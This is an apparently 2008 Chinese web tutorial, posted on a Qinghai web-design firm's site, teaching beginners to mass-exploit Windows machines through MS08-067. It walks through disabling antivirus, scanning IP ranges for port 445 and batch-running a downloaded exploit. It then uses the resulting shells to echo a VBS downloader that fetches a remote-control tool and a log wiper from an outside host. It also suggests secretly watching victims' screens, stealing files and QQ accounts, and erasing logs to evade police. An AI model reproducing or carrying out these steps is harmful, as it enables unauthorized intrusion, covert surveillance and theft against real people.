青海網站建設、網絡推廣最好的公司--您身邊的網站建設專家,馬上拿起電話,聯系我們:0971-8235355   
黑龙江11选5预测网 黑龙江11选5预测网 |  公司簡介 |  網站建設 |  網絡推廣 |  空間租用 |  域名注冊 |  企業郵局 |  網絡安全 |  網站編程 |  客服中心 |  聯系我們 |  人才招聘
 
西寧威勢最新網站制做案例展示
Lastest Project
 
西寧網站建設  
當前位置為:黑龙江11选5预测网 >> 安全防護 >> 正文  
《入侵三步曲之掃描-溢出-上傳木馬》

文章來源: 黑龙江11选5预测网     發布時間:2008-11-9    瀏覽次數:15451    tags:掃描 溢出 入侵 上傳木馬 MS0806

《入侵三步曲之掃描-溢出-上傳木馬》之上篇

孤行一鬼手把手教你一步步入侵--------------------MS08-067漏洞利用

 

      其實寫一篇入侵的文章并不困難,但是寫一篇讓大眾化和菜鳥們都能理解和撐握的文章真是有點難度(這里我暫且把上網時間有一年的稱之為大眾化),所以在開始文章之前,我先簡單的介紹一下我的文章的結構,以方便小菜菜們理清自己的思路。文章結構如下

一、前言

二、文章版權說明

三、準備篇

四、掃描篇

五、攻擊篇

六、木馬上傳篇

七、遠程控制篇

OK,言歸正傳,Let’s Go !

前言

        我寫本文的目的是為了讓大家提高網絡安全意識,了解黑客的攻擊原理,并讓大家知道防范措施,并不是真正的教你去入侵別人的電腦及服務器,本文在發表之時,全球仍有N多服務器有此漏洞,文中提到的方法對別人的服務器及個人電腦有很大的攻擊性,請您讀完本文后請勿嘗試模仿攻擊別人,這樣可能會引起法律后果,如果您不同意我的觀點,請您不要接著往下看了,否則如果您由于攻擊別人引起的任何法律后果與文章作者無關!

    我的廢話說完了,如果同意上面的觀點,接著往下看

文章版權說明

    此文章由西寧威勢電子信息服務有限公司 孤行一鬼 首發于 西寧威勢電子信息服務有限公司網站“網絡安全”頻道 網址:黑龙江11选5预测网

作者充許您可以隨時隨意轉載,但是轉載時請注明出處及保持文章的完整性,作者會很感激您的^_^ ,Ok又雞婆了,接下來我們我們再看

準備篇

    我們在開始之前,首先要知道我們具體要做些什么,如何去做,需要什么樣的環境及軟件等,OK 我一項一項來說明

攻擊環境:

1、WINDOWS XP / WINDOWS 2003 / WINDOWS 2000 操作系統中的任意一版本

2、CMD.EXE (為了通俗,有些人叫他為DOS窗口)

  注,有些XP版的操作系統是精減版的,此項可能被禁用了,這樣的是不行的,如果你還不知道什么是CMD.EXE的話,沒關系,往下看,下面會提到。

3、WEB空間 一個(個?)

用來存放我們的木馬,不需要太大,以便在肉機上下載

所需工具:

    孤行一鬼已經幫你們全打好包了,從下面的地址下載就可以得到,下載前請注意,下載的文件中有些文件或者是全部文件可能會被殺毒軟件報為病毒處理,所以下載前,到入侵整個過程中,我們都要關閉殺毒軟件。我們下載的工具,它對別人的電腦具有一定的攻擊性,但不關你運行與否,它都不會對您的電腦有任何的危害,所以我們竟可放心運行,但是如果您對殺毒軟件的警告很在意的話,那么我告訴你,下面的文章你也沒有必要看下去了,就此收手!

下載地址:

//www.ymbxx.icu/tools/tools.rar

下載的是一個壓縮包,需要用WINRAR軟件解壓,解壓開的文件中包括以下幾個名字:

s.exe    掃描器,用來掃描我們的入侵目標

MS.exe (MS08067.EXE) 漏洞溢出工具,用來攻擊目標

Radmin.exe    一款商業遠程控制軟件,我們用它來登錄肉機,當然你也可以換成你自己的

孤行一鬼.EXE 孤行一鬼專用的登錄器,用來登錄肉機用的控制端

Down.vbs  用來向肉機中下載R.EXE文件的腳本程序

LogKiller.exe 入侵完成后用來刪除日志,以防別人找見我們的小工具,用來擦PP

 

      OK,工具差不多這些就足夠了,我們再補補有些菜鳥們的DOS知識,我們好多人都在學別人入侵,但是照著別人的樣子,一字不差的輸入同樣的命令,別人能運行成功,自己卻運行不了,為什么呢,舉個例子來說,我們下面要用S掃描器掃描肉機,我的步驟如下:

  點開始,再點運行,在里面輸入CMD然后回車:

注意,你的操作系統和我的有可能不一樣,看到的界面有些出入,均不妨礙我們的操作

回車后得到下面的一個界面

OK,為了方便我們菜鳥理解,我們暫且把這個窗口叫做“DOS窗口”吧,其實這樣叫是不對的,這個窗口也就是我前面所說的CMD.EXE ,如果你發現你連這個窗口都打不開的話,那么說明你的操作系統禁用了CMD.EXE,請您先解決這個問題,再來往下看

下面我們了解一下常用的DOS命令

1、cd

這個命令是用來改變目錄的,什么叫做目錄呢?就是我們上面這個“DOS窗口”中看到的

以下是引用片段:

C:\docements and settings\Administrator

這個就代表我們計算機上的一個目錄,了解這一點,對我們有些不懂的人很重要,我們首先從上面的網址下載程序,下載后解壓到D:\TOOLS\目錄下(當然也可以是其它目錄,我的電腦上是這樣的目錄D:\hacker\tools\),如果我們電腦上的D盤沒有這個TOOLS目錄,我們可以自己建一個,然后再把文件解壓進去,然后我們在上面的DOS窗口中輸入以下的命令,將當前路徑轉到我們工具文件所在的路徑中:

以下是引用片段:

Cd d:\tools\ 回車

注意,“回車”是我的提示,不是命令的^_^,如果你連這兩個字都輸入進去,那你可以去當黑客了. Cd是命令,CD后面跟一個空格,然后是路徑,在我的電腦上因為工具全放在D:\HACER\TOOLS\下面,所以是這樣的命令,這個根據你的工具路徑而定

這是我們注意到了,當前路徑已經切換到了我們工具所在的路徑了

這樣我們的掃描器才可以使用,否則,你要依照我的方法照做的時候,有可能會看到下面的出錯提示:

OK,我相信,好多菜鳥就是卡在這一步上的,知道了如何解決,我們就可以繼續了

2、其它的DOS命令,遇到了我再加以說明,這里不再雞婆了

 

掃描篇

 

OK,我們下面來確定攻擊范圍。自從沖擊波病毒爆發,好多互聯網接入商將一些危險的端口給屏蔽掉了,我們今天要用到的445端口就被直接屏蔽了,他們通常只能在同一個網段下才可以互相訪問,不同網段或不同網關下,即使對方開了445端口,我們也訪問不了,這一點影響了我們抓雞的范圍,所以,我們今天只找同一網段的肉機吧

OK,我們來查看一下自己的IP地址,打開個這網址

//www.ip138.com

以下是引用片段:
您的IP地址是:[220.167.123.45]

上面是我看到我的IP,你看到的肯定和我的不一樣,OK,我們再在可以這樣定位掃描的IP范圍

開始IP:220.167.100.1 結束IP:220.167.254.254

注意,最大是255

OK,我們自己的IP地址是位于這兩個IP之間的,這個范圍你根據自己的需要自己設定,最小是0,最大是255

現在我們回到DOS窗口中,注意,要切換到工具所在的路徑中,用S掃描器進行掃描

因為我們溢出的是RPC服務,所以要掃描445端口 ,我們在窗口中輸入以下命令

注意,抓圖很累人的,以下文章中,我在不抓圖的時候盡量不抓了,大家明白怎么輸入命令就可以了

上圖中,S是我們要用的工具 TCP是掃描方式 下來是開始IP,結束IP 端口號 線程數 /SAVE代表把掃描結果保存起來

然后加車,我們的掃描器就開始掃描這個IP段所有開放了445端口的服務器

掃描過程中出現提示和以下文字類似

以下是引用片段:

220.167.247.136  445   Open

220.167.247.168  445   Open

220.167.247.177  445   Open

220.167.247.187  445   Open

220.167.247.207  445   Open

220.167.247.196  445   Open

220.167.247.216  445   Open

220.167.247.248  445   Open

220.167.248.123  445   Open

220.167.248.146  445   Open

220.167.248.179  445   Open

220.167.249.118  445   Open

220.167.249.127  445   Open

220.167.249.156  445   Open

220.167.249.123  445   Open

220.167.249.189  445   Open

220.167.249.193  445   Open

220.167.249.191  445   Open

220.167.249.224  445   Open

220.167.250.52   445   Open

220.167.250.127  445   Open

220.167.250.137  445   Open

Scan 39426 IPs Complete In 0 Hours 47 Minutes 28 Seconds. Found 578 Hosts

OPEN就是開放端口的意思,掃描完成后給出提示,掃描了39426個IP,花去了47分鐘時間,發現了578個開放445端口的主機,掃描完成后,在S.EXE文件所在位置找到Result.txt文件,這里面保存了掃描結果。OK,我們把這個文件中其它信息全刪除掉,只留個IP列表就可以了,這個怎么操作,你自己發揮吧,可以批刪除,替換,我就不說了

在每個IP前面加上ms 注意,后面有一個空格,然后把文件保存成一個BAT文件,保存到和工具同一個目錄的地方,不要保存到桌面之類,到時候自己找不到。

給大家抓個圖說明一下

怎么把Result.txt文件保存成BAT文件?OK,小菜們跟我來,大鳥們飛過這段

雙擊Result.txt,用記事本打開Result.txt文件,我們將格式按要求轉換好以后選擇文件菜彈,另存為

注意保存路徑 ,文件名后面有個.BAT,點是半角實心的,不是中文輸入法下的,保存類型選把所有文件。

我們把處理好的文件保存成一個445.BAT的批處理文件了,注意,445.bat一定要和溢出工具MS.EXE放在同一目錄下。

小提示:

有些人的電腦上看不到文件的后輟名,只能看到445,這是因為你沒有打開后輟名查看功能,用以下方法可以打開

雙擊 我的電腦 然后選菜單中的 工具 命令 ,接下來 選項>>查看>>在查看頁中找到高級設置中的“隱藏已知文件中的擴展名” 將前面的對色取消掉,一路確定下來就可以看到文件的擴展名了。OK,說了一堆沒用的話,我們繼續

這個445.BAT是我們處理好的批處理文件,我們在DOS下面就可以直接運行了

 

 

攻擊篇

 

做完以上的工作,我們可以開始攻擊了,攻擊目標就是掃描中開放了445端口的服務器,我們直接在DOS窗口中運行445.BAT程序就可以了

掃描窗口中,輸入445.bat回車,程序就自己開始溢出攻擊了

注意,我們掃描前和攻擊前,除了要關閉殺毒軟件,還要關閉防火墻,以免防火墻攔截攻擊程序發包,造成溢出失敗,前面忘說了,這里面補上,操作系統自帶的ICS防火墻彈出提示,讓我們選擇時,我們選擇“解決阻止”就可以了。

溢出過程中,窗口不斷有類似下面的信息在滾動,抓圖如下:

OK,這是一個漫長的過程,我們可以讓電腦自動去攻擊,我們去喝上一杯茶水再來

《入侵三步曲之掃描-溢出-上傳木馬》之下篇

    SOORY,給大家說一下,由于下班了,所以文章沒有寫完,就直接回家了,下面是在家里玩的時候,給大家寫的,目錄名和前面的不一樣,但是道理是一樣的,大家原諒。

上篇中我們力求用最簡單通俗的語言給大家講解了一些基礎知識,包括掃描過程,溢出過程,下面我們繼續。

    當我們看到溢出的時候有這樣的提示的時候,說明溢出成功了!

以下是引用片段:

E:\hacker\ms08067>ms 123.45.67.89

MS08-067 Exploit for CN by [email protected]

SMB Connect OK!

Send Payload Over!

E:\hacker\ms08067>

    溢出成功后,肉機會開放4444端口,我們在命令行(DOS窗口中)中輸入這樣的命令來登錄肉機,

以下是引用片段: 注意空格
E:\hacker\ms08067>telnet 123.45.67.89  4444

 

    回車后要是我們看到這樣的提示,說明這臺肉機已經是歸于我們所有了

以下是引用片段:

Microsoft Windows XP [版本 5.1.2600]

(C) 版權所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

      我已經telnet登錄上去了,注意,我們也可以用NC登錄,NC在回顯方面比TELNET好一點,OK,我們來看看這臺肉機有沒有什么我感興趣的東東

以下命令直接在得到的CMDSHELL中輸入(CMDSHELL就是人機交互的這個界面,你可以簡單的理解成TELNET登錄成功的這個DOS窗口)有些命令是我輸入的,有些是系統回顯的,我在后面加以簡單的批注,大家一起來看看我是怎么樣一步步將這個肉機控制的

D:\     [括號中是我加的批注,不要輸入,從C盤切換到D盤]

D:\>dir  [我們來看看有沒有好玩的東東]

Dir     [注意,以下是系統回顯的信息,不用我們輸入]

以下是引用片段:
驅動器 D 中的卷沒有標簽。

 卷的序列號是 3754-1BDB

 D:\ 的目錄

2008-04-23  19:12    <DIR>          QQ

2008-04-23  19:12    <DIR>          QQMusic

… …. … …… ……                   [注意,為了用戶隱私,我略去部分內容]

2008-04-23  19:19    <DIR>          Program Files

200804-23  18:21    <DIR>          ABCDEFG

               1 個文件      3,924,415 字節

              32個目錄 56,504,224,256 可用字節

 [系統回顯完畢]

OK,用同樣的命令查看其它盤符下的文件,我們再看看肉機上都有什么服務在運行(你要不知道什么是服務的話,可以簡單的理解為程序,其實兩者是有區別的)

以下是引用片段:

D:\>c:  [切換到C盤,C盤SYSTEM32目錄下文件多,好辦事,嘿嘿]

c:      [系統回顯,不用輸入]

C:\WINDOWS\system32>net start  [系統切換到C:\WINDOWS\SYSTEM32目錄下了,net start 是我輸入的命令,查看肉機啟動的服務]

net start                        [系統回顯]

以下是引用片段:

已經啟動以下 Windows 服務:    [以下都是回顯,不用輸入]

 

   Application Layer Gateway Service

   Automatic Updates

   COM+ Event System

   Computer Browser

   Contrl Center of Storm Media

   Cryptographic Services

   DCOM Server Process Launcher

   DHCP Client

   Distributed Link Tracking Client

   DNS Client

   Error Reporting Service

   Event Log

   Fast User Switching Compatibility

   Help and Support

   IPSEC Services

   Logical Disk Manager

   Network Connections

   Network Location Awareness (NLA)

   Plug and Play

   Print Spooler

   Protected Storage

   Remote Access Connection Manager

   Remote Procedure Call (RPC)

   Remote Registry

   Rising Process Communication Center

   Secondary Logon

   Security Accounts Manager

   Security Center

   Server

   Shell Hardware Detection

   SSDP Discovery Service

   System Event Notification

   Task Scheduler

   TCP/IP NetBIOS Helper

   Telephony

   Terminal Services

   Themes

   WebClient

   Windows Audio

   Windows Firewall/Internet Connection Sharing (ICS)

   Windows Image Acquisition (WIA)

   Windows Management Instrumentation

   Windows Time

   Wireless Zero Configuration

   Workstation

命令成功完成。

[回顯完畢]

    我們看到肉機上運行了瑞星殺毒服務,OK,我們傳一個腳本上去,用腳本下載我們的木馬程序在肉機上運行(什么叫肉機?郁悶!自己查去?。?/P>

    在網上搜索了一個VBS下載腳本,傳上去了,結果被瑞星給殺了,郁悶,下載失敗,所以自己寫了一個DOWN.VBS腳本,腳本內容在以后再在我網站公開,以防大家模仿攻擊別人,大家如有興趣,可以留意我的網站:黑龙江11选5预测网(賣個關子,做個小廣告,嘿嘿)過段時間我掛上去,嘿嘿,完全免殺的。先把網上找的腳本給大家看吧,說明一下怎么用。打開記事本(你說什么?不知道記事本怎么打開?你怎么不去撞墻??!在DOS窗口中輸入notepad回車就可以打開了)將以下的代碼粘貼進去,注意,前幾行是我加的說明,不要粘進去.

‘文件名:down.vbs( 這段不要輸入記事本里面)

‘文件說明,用來下載網上的文件到肉機電腦中,代碼來自于互聯搜索( 這段不要輸入記事本里面)

‘法律申明:以下腳本僅用于測試,請勿用于非法入侵,代碼作者不承擔任何法律責任( 這段不要輸入記事本里面)

    代碼正式開始:(下面的開始,輸入到記事本里面)

以下是引用片段:

echo sub module() >>down.vbs

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>down.vbs

echo xPost.Open "GET","//www.ymbxx.icu/hacker/"^&strha ,0 >>down.vbs  //木馬文件存放的空間,比如你的木馬存在ABC.COM上面,就把上面的地址換成你的WWW.ABC.COM ,此行是我加的批注,不要輸入到記事本中,以下看到的//后面的內容都是我加的說明,不要輸入

echo xPost.Send() >>down.vbs

echo Set sGet = CreateObject("ADODB.Stream") >>down.vbs

echo sGet.Mode = 3 >>down.vbs

echo sGet.Type = 1 >>down.vbs

echo sGet.Open() >>down.vbs

echo sGet.Write(xPost.responseBody) >>down.vbs

echo sGet.SaveToFile "c:\"^&strha,2 >>down.vbs

echo set xPost=Nothing >>down.vbs

echo set sGet=Nothing >>down.vbs

echo end sub >>down.vbs

echo for i=1 to 3 >>down.vbs //要下載3個文件的意思,“//”后面的是我的說明不要輸入

echo select case i >>down.vbs

echo case 1 >>down.vbs   

echo strha="radmin.exe" >>down.vbs  //要下載的第一個文件,你可以換成你的

echo call module() >>down.vbs

echo case 2 >>down.vbs

echo strha="logkiller" >>down.vbs

echo call module() >>down.vbs

echo case 3 >>down.vbs

echo strha="XXX(XXX換成你的文件名)" >>down.vbs

echo call module() >>down.vbs

echo end select >>down.vbs

echo next >>down.vbs

    我們把上面的代碼復制,然后回到CMDSHELL中點右鍵粘貼,我們這么做的目的是用DOS的ECHO命令將代碼寫到肉機的DOWN.VBS文件中,OK,寫入完成后,我們DIR一下,看有沒有寫入成功,DIR DOWN.VBS就可以了,要是文件寫入成功了,我們直接運行

    小提示:以上代碼是從網上搜索來的,寫的比我還雞婆,還會被殺毒軟件殺掉,我自己測試的時候用的是我自己寫的DOWN.VBS腳本,大家可以在本站中找到。

以下是引用片段:

C:\WINDOWS\system32>down.vbs  [我們把腳本ECHO到肉機電腦中后直接輸入運行]

down.vbs

[腳本已經運行了]

[稍等片刻,時間由肉機的網速而定,我們看一下文件下載下來了沒]

以下是引用片段:

C:\WINDOWS\system32>dir radmin.exe  

 dir radmin.exe   [這里開始是系統回顯]

 驅動器 C 中的卷沒有標簽。

 卷的序列號是 ABCE-CDE12

 C:\WINDOWS\system32 的目錄

2008-04-23 11:48           274,753 radmin.exe

               1 個文件        274,753 字節

               0 個目錄  20,258,657,956 可用字節

[嘿嘿,文件已經好好的躺在那里,我們刪除下載腳本,以防被人發現]

以下是引用片段:

C:\WINDOWS\system32>del down.vbs   [我輸入的刪除命令]

del down.vbs

C:\WINDOWS\system32>radmin.exe  [刪除成功后我們來運行遠程控制的服務端]

radmin.exe

 

  [運行后我們查看一下是否成功了,成功后會打開特定端口,我們要是換成木馬的話,嘿嘿,是看不到端口的,在這里我們不做過格的事情,用RADMIN來代替,服務運行成功后會開1038端口]

下面是系統回顯:

以下是引用片段:

Active Connections

  Proto  Local Address          Foreign Address        State

  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING

  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING

  TCP    0.0.0.0:6059           0.0.0.0:0              LISTENING

  TCP    192.168.49.40:139      0.0.0.0:0              LISTENING

  TCP    123.45.67.89:445     221.***.***.9:23343    ESTABLISHED

  TCP    123.45.67.89:1050    219.***.***.243:8000    CLOSE_WAIT

  TCP    123.45.67.89:1053    219.***.***.142:443     CLOSE_WAIT

  TCP    123.45.67.89:1060    219.***.***.142:443     CLOSE_WAIT

  TCP    123.45.67.89:1135    124.***.***.:443      ESTABLISHED

  TCP    123.45.67.89:1152    219.***.***.42:443     CLOSE_WAIT

  TCP    123.45.67.89:1303    124.***.***.:443      ESTABLISHED

  TCP    123.45.67.89:1657    219.***.***.243:8000    ESTABLISHED

  TCP    123.45.67.89:2137    61.***.***..9:80         TIME_WAIT

  TCP    123.45.67.89:2138    61.***.***..7:8000       TIME_WAIT

  TCP    123.45.67.89:2139    61.***.***..9:8000       TIME_WAIT

  TCP    123.45.67.89:2140    61.***.***..7:80         TIME_WAIT

  TCP    123.45.67.89:2141    61.***.***..9:8000       TIME_WAIT

  TCP    123.45.67.89:2142    61.***.***..7:80         TIME_WAIT

  TCP    123.45.67.89:2143    61.***.***..7:8000       TIME_WAIT

  TCP    123.45.67.89:2144    61.***.***..9:80         TIME_WAIT

  TCP    123.45.67.89:2145    123.***.***..66:443     TIME_WAIT

  TCP    123.45.67.89:2146    123.***.***..99:443     ESTABLISHED

  TCP    123.45.67.89:4444    221.***.***..59:23415    ESTABLISHED

  UDP    0.0.0.0:445            *:*

  UDP    0.0.0.0:500            *:*

  UDP    0.0.0.0:1025           *:*

  UDP    0.0.0.0:4000           *:*

  UDP    0.0.0.0:4001           *:*

  UDP    0.0.0.0:4002           *:*

  UDP    0.0.0.0:4003           *:*

  UDP    0.0.0.0:4004           *:*

  UDP    0.0.0.0:4500           *:*

  UDP    0.0.0.0:5354           *:*

  UDP    0.0.0.0:5357           *:*

  UDP    0.0.0.0:6000           *:*

  UDP    127.0.0.1:123          *:*

  UDP    127.0.0.1:1048         *:*

  UDP    127.0.0.1:1055         *:*

  UDP    127.0.0.1:1140         *:*

  UDP    127.0.0.1:1161         *:*

  UDP    127.0.0.1:1304         *:*

  UDP    127.0.0.1:1328         *:*

  UDP    127.0.0.1:1900         *:*

  UDP    192.168.49.40:123      *:*

  UDP    192.168.49.40:137      *:*

  UDP    192.168.49.40:138      *:*

  UDP    192.168.49.40:1900     *:*

  UDP    123.45.67.89:123     *:*

  UDP    123.45.67.89:1900    *:*

 

C:\WINDOWS\system32>

還沒有開,說明還沒有運行成功

稍等片刻,再運行一下上面的命令

以下是引用片段:

C:\WINDOWS\system32>netstat -an

netstat -an

 

Active Connections

 

  Proto  Local Address          Foreign Address        State

  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING

  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING

  TCP    0.0.0.0:6059           0.0.0.0:0              LISTENING

  TCP    0.0.0.0:1038           0.0.0.0:0         ESTABLISHED

  UDP    0.0.0.0:445            *:*

  UDP    0.0.0.0:500            *:*

  UDP    0.0.0.0:1025           *:*

  UDP    192.168.49.40:1900     *:*

  UDP    123.45.67.89:123     *:*

  UDP    123.45.67.89:1900    *:*

 

C:\WINDOWS\system32>

 

    我們省取一些沒有用的回顯信息,我們看到了,端口已經成功開放,OK,我們在本機用客戶端登錄

    我們打開客戶端,我對上面的圖標菜單依次加一簡單的說明

    也就是上面的15個圖標,其中第三個和第四個是灰色的,我們點第二個有加號的,增加一個服務端,

    出顯上面的界面后我們依上面我信息照樣輸入,IP換成我們溢出得到的IP就可以了,端口換成我們配置的服務端的端口1038,點OK

    我們看到多了一個服務端,先點第六個圖標(千萬不要點錯),也就是只查看不控制,第五個是控制的,不要亂點,會讓人家發現的?。?!

    點了第六個圖標后,我們再雙擊“肉機來了哈哈”服務端,彈出對話框,輸入密碼,OK,我們就登錄到肉機上去了,這時我們可以偷看別人的屏幕,而肉機主人一點也沒有察覺,嘿嘿,看看肉機主人在做什么?

 

    嘿嘿,為了?;け鶉艘?,放個小圖吧

    我們接下來可以做很多事情,比如說,偷取文件,盜取QQ號,(這MM看上去QQ真多)裝個木馬,遠程控制肉機,打開肉機的聲音,或視頻偷拍之類(靠,不要扔磚頭!不說了,教壞小孩子可不好)

OK,我們刪除日志

以下是引用片段:

C:\WINDOWS\system32>logkiller

logkiller

Log Killer V1.0 By WinEggDrop

Cleaning Event Logs......

Clean Application Event Log Successfully

Clean Security Event Log Successfully

Clean System Event Log Successfully

-----------------------------------------------------------------------------

Backing Up Services Status...... Done

-----------------------------------------------------------------------------

Stopping Services......

…….

省取一堆日志刪除的回顯,這時的畫面頗有點黑客帝國的畫面,屏閃很快,看著過癮,這樣警察叔叔就找不著我們了,呵呵

C:\WINDOWS\system32>Del logkiller.exe

Del logkiller.exe

    擦完PP后我們再過河拆橋,把這個LOGKILLER.EXE也干掉,完事之后我們可以高興的輸入命令退出,然后用遠程控制軟件蹂躪這個肉機了

以下是引用片段:

C:\WINDOWS\system32>exit

失去了跟主機的連接。

C:\Documents and Settings\Administrator>

 

退出,閃人

后記:由于我一邊入侵做演示,一邊還要抓圖寫文章,花了我差不多四十多分鐘的時間,其實,真正的入侵過程我只花了兩三分鐘,包括從溢出成功到木馬上傳,再到刪除日志走人,遠程控制登錄,中間沒有碰到任何難題。這些都是我積累下來的經驗,但是我們有時候入侵的時候往往沒有這么順利,在入侵過程中經?;嵊齙膠蛻倍救砑嚶?,我們還要免殺自己的木馬,或是想盡千方百計干掉殺毒軟件,突破防火墻之類,這里我們暫且不提這些了,這些不是今天的重點。


上一篇:電腦重要數據備份與恢復速查手冊
下一篇:[原創]IIS日志時間和本地時間不符,怎么樣取得準確時間?
評論列表
正在加載評論……
  
評論   
呢  稱:
驗證碼: 若看不清請點擊更換!
內  容:
 
 
  在線洽談咨詢:
點擊這里,在線洽談   點擊這里,在線洽談   點擊這里,在線洽談
與我交談  與我交談 與我交談
乘車路線    匯款方式   加盟合作  人才招聘  
公司地址:青海省西寧市西關大街73號(三二四部隊招行所四樓)     青ICP備13000578號-1 公安機關備案號:63010402000123    
QQ:147399120    mail:[email protected]    電話: 13897410341    郵編:810000
© Copyright( 2008-2009) www.ymbxx.icu All Rights Reserved    版權所有:西寧威勢電子信息服務有限公司 未經書面制授權,請勿隨意轉載!
業務:青海網站制做、青海網站建設、青海網頁設計、西寧網站制做、西寧網站建設、青海域名注冊、青海網絡推廣、青海網站推廣、青??占渥庥?/a>、黑龙江11选5预测网、黑龙江11选5预测网、網絡安全